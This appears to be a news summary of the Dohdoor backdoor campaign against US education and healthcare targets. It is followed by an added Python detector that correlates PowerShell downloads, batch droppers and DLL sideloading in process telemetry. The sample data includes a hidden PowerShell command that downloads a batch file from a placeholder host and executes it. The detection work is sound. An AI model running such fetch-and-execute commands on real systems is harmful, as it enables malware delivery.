
"We observed that the attacker had infected several educational institutions, including a university that is connected to several other institutions, indicating a potential wider attack surface. Additionally, one of the affected entities was a healthcare facility, specifically for elderly care. Based on the nature of the victimology in the current intrusions, the actor likely has a motive for financial gain."
"The attackers likely gain initial access via social engineering and phishing, and the multi-stage infection ultimately delivers a new backdoor, Dohdoor, which shares similar technical characteristics to Lazarus Group's Lazarloader malware. After gaining access through a phishing email, the intruders execute a PowerShell downloader that runs a Windows batch script dropper from a remote staging server."
"The DLL, which Talos calls Dohdoor, operates as a loader, and it downloads, decrypts, and executes malicious payloads within legitimate Windows processes. This gives the intruders backdoor access to the victim's environment so it can download the next payload - a Cobalt Strike Beacon - into the machine's memory."
A hacking group tracked as UAT-10027, possibly linked to North Korea, has been conducting cyberattacks against US educational institutions and healthcare facilities since at least December. The campaign uses a previously unknown backdoor malware called Dohdoor. Initial access is gained through phishing and social engineering tactics. The multi-stage infection process involves PowerShell downloaders, batch scripts, and DLL sideloading techniques to execute malicious code. Dohdoor functions as a loader that downloads and executes payloads within legitimate Windows processes, providing backdoor access and enabling deployment of Cobalt Strike Beacons. The attackers employ stealthy techniques to evade detection. Based on victimology patterns, the threat actors appear motivated by financial gain.
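The staged chain summarized above (a PowerShell downloader that runs a batch dropper, followed by a DLL sideloaded into a legitimate process) can be hunted for in process-creation and image-load telemetry by correlating lineage across the stages. The Python below is an added detection example, not code from the article or from Talos; the event layout, the `ProcEvent` record, and every path, URL and PID in the sample are constructed and are not indicators from the campaign.

```python
import re
from dataclasses import dataclass, field
@dataclass
class ProcEvent:                     # one process-creation record (constructed shape)
    pid: int
    ppid: int
    image: str                       # full path of the executable
    cmdline: str
    loaded_dlls: list = field(default_factory=list)  # image-load paths seen in that process

DOWNLOAD_RE = re.compile(r"downloadstring|invoke-webrequest|\biwr\b|net\.webclient|https?://", re.I)
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\public\\", "\\programdata\\")

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def _ancestor(by_pid, pid, depth, pred):
    """Walk up at most `depth` parents; return the first one satisfying pred, else None."""
    for _ in range(depth):
        proc = by_pid.get(pid)
        if proc is None or pred(proc):
            return proc
        pid = proc.ppid
    return None

def find_sideload_chains(events, max_depth=3):
    """Return (powershell_pid, batch_pid, sideload_pid, dll) for each process that loaded a
    DLL from a user-writable directory, has a cmd.exe *.bat ancestor, and above that a
    PowerShell ancestor whose command line shows a download (the chain in the article)."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        for dll in (d for d in e.loaded_dlls if any(m in d.lower() for m in USER_WRITABLE)):
            batch = _ancestor(by_pid, e.ppid, max_depth,
                              lambda p: _basename(p.image) == "cmd.exe" and ".bat" in p.cmdline.lower())
            ps = batch and _ancestor(by_pid, batch.ppid, max_depth,
                                     lambda p: _basename(p.image) == "powershell.exe" and DOWNLOAD_RE.search(p.cmdline))
            if ps:
                hits.append((ps.pid, batch.pid, e.pid, dll))
    return hits
SAMPLE_EVENTS = [  # constructed telemetry; paths, URL and PIDs are not indicators from the campaign
    ProcEvent(200, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell -w hidden -c "iwr http://staging.invalid/d.bat -OutFile $env:TEMP\s.bat; cmd /c $env:TEMP\s.bat"'),
    ProcEvent(300, 200, r"C:\Windows\System32\cmd.exe", r"cmd /c C:\Users\u\AppData\Local\Temp\s.bat"),
    ProcEvent(400, 300, r"C:\Users\u\AppData\Local\Temp\viewer.exe", "viewer.exe",
              loaded_dlls=[r"C:\Users\u\AppData\Local\Temp\helper.dll"]),
    ProcEvent(500, 100, r"C:\Windows\System32\cmd.exe", r"cmd /c C:\Scripts\backup.bat"),  # benign: no PowerShell downloader above it
    ProcEvent(600, 500, r"C:\Users\u\AppData\Local\Temp\7z.exe", "7z a backup.7z", loaded_dlls=[r"C:\Users\u\AppData\Local\Temp\7z.dll"]),
]
```

Running `find_sideload_chains(SAMPLE_EVENTS)` flags only the first lineage; the benign batch job is not reported because no downloading PowerShell process sits above it, which is the correlation that keeps this from firing on every script that loads a DLL from a user directory.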
#dohdoor-malware #north-korean-hackers #education-and-healthcare-cyberattacks #phishing-and-social-engineering #dll-sideloading
Read at Theregister